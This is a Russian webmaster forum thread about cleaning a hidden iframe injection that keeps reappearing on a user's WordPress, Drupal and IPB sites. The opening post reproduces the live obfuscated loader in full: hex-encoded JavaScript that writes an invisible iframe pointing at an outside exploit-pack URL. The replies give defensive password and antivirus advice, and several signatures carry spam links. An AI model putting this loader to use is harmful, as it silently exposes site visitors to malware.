Как бороться с внедренными скриптами?

Сеодром
На сайте с 27.11.2007
Offline
187
972

Кто-нибудь может объяснить, что именно делает эта штука, для чего она нужна и как с ней бороться?

<script>function v4820bc54d0a0c(v4820bc54d46a9){ var v4820bc54d9772=16; return(parseInt(v4820bc54d46a9,v4820bc54d9772));}function v4820bc54e3532(v4820bc54e7f35){ var v4820bc5502895=2; var v4820bc54ecd44='';for(v4820bc54f1b7e=0; v4820bc54f1b7e<v4820bc54e7f35.length; v4820bc54f1b7e+=v4820bc5502895){ v4820bc54ecd44+=(String.fromCharCode(v4820bc54d0a0c(v4820bc54e7f35.substr(v4820bc54f1b7e, v4820bc5502895))));}return v4820bc54ecd44;} document.write(v4820bc54e3532('3C696672616D65206E616D653D27613732616639386633316127207372633D27687474703A2F2F61726368696D656433332E72752F61646D696E2F7061636B2F696E6465782E706870272077696474683D343537206865696768743D3633207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

Обнаружил подобные вещи на пяти своих сайтах с разными движками - и WP и Drupal и IPB.... Поудалял, проблема в том, что делал то же самое недели две назад и вот "опять двадцать пять".

На этой партнёрке я получаю немного баксов в неделю , зато постоянно: https://goo.su/z9gsI2
Progr@mmer\.
На сайте с 14.10.2007
Offline
44
#1

Не могу сейчас раскодировать, чтоб сказать что это, но вроде вирус.

Пароли от фтп срочно меняйте, если пользуйтесь тотал коммандер, как фтп клиентом, то убивайте эту программу и берите FileZilla.

P.S.: за место "document.write" напишите "alert" и попробуйте запустить. Увидите, что у вас там за скрипт.

Вашей девушке не хватает романтики? Черпните её на сайте «Я Люблю Романтику» (http://iloveromantics.ru/). Романтический форум (http://forum.iloveromantics.ru/) для отдыха от нудной работы.
Сеодром
На сайте с 27.11.2007
Offline
187
#2

Думаете, какой-нить троянчик похитил пароли с тотал-коммандера? Может быть, только внедрен похожий код был в 5 сайтов из 25. Но в любом случае, за файзиллу спасибо.

DyaDya
На сайте с 11.04.2007
Offline
147
#3

Можете даже не сомневаться, что там вирусняк))). сколько же вас, с такой заразой.

Меняйте ФТП!!! Ставьте антивири!!! Ставьте файрволы!!!

<iframe name='a72af98f31a' src='[удалил, чтобы не подхватили очередные новички]' width=457 height=63 style='display:none'></iframe>

НЕ надо туда заходить!!! поверьте на слово, там будет вирь)

Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)
basilic
На сайте с 16.05.2008
Offline
369
#4

Вас хакнули и залали iframe для слива iframe-трафика, сейчас это практикуется сплошь и рядом.

Почему после того как вы в первые об этом узнали не сменили пароли?

Если сменили, то почему не сменили движки?

По поводу друпала не в курсе, но WP и форумы - рай для хакеришек.

Качайте обновлённые версии, хотя это всегда так неохота.

Stripe
На сайте с 05.09.2006
Offline
222
#5
Сеодром:
Обнаружил подобные вещи на пяти своих сайтах с разными движками - и WP и Drupal и IPB.... Поудалял, проблема в том, что делал то же самое недели две назад и вот "опять двадцать пять".

Пароли от FTP не храните в клентах FTP. Поставьте нормальный антивирус.

Сайты от 30р почти по любой теме или наполнение ваших сайтов (/ru/forum/887821) дешевым контентом. Базы товаров и контента (http://nakovalnja.ru). Вечные ссылки за 1$ или 30р. (/ru/forum/741397)
mastajedi
На сайте с 03.09.2007
Offline
68
#6
Progr@mmer\.:
Не могу сейчас раскодировать, чтоб сказать что это, но вроде вирус.
Пароли от фтп срочно меняйте, если пользуйтесь тотал коммандер, как фтп клиентом, то убивайте эту программу и берите FileZilla.
P.S.: за место "document.write" напишите "alert" и попробуйте запустить. Увидите, что у вас там за скрипт.

Пароли от фтп, конечно, надо поменять, можно и фтп-клиент сменить, но если пароли хранить в клиенте, то все равно какой фтп-клиент у вас, могут и из любого другого похитить. Так что главное не хранить пароли в программах, и в фтп-клиентах и во всех остальных.

Сам имел такой опыт с ифреймами, и от сапы пароль увели 1 раз, какой-то черт на свой сайт ссылок напокупал, пока с администрацией сапы переписывался, он на 10 уе ссылок поимел...

Так что берегите пароли!!

Да пребудет с вами Сила!
Сеодром
На сайте с 27.11.2007
Offline
187
#7

Хорошо, что вы называете нормальным антивирусом и как нужно хранить пароли?

mastajedi
На сайте с 03.09.2007
Offline
68
#8
Сеодром:
Хорошо, что вы называете нормальным антивирусом и как нужно хранить пароли?

Пароли надо хранить в голове, ну или на бумажке в крайнем случае)

А насчет лучшего антивируса, тут сколько человек столько и мнений, у меня стоит Nod32, хотя я в нем разочаровался, тк он пропустил того трояна, который пароли от сапы увел, а они хранились в Firefox'е. вылечился я тогда утилиткой от доктора веба cureit, а Nod32 ничего не видел...

если интересно почитайте тут - http://virusinfo.info/showthread.php?t=1235

Сеодром
На сайте с 27.11.2007
Offline
187
#9

Таки да - это я про мнения. Аваст всегда меня спасал, а в последние пару месяцев что-то не справляется уже....

[Удален]
#10

бывало спасался так - в аккаунт вбивал только часть пароля

***** = 12345 - а при входе еще добивал 678 -

более менее защищает от вирусни которая в index.php iframe вставляет

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий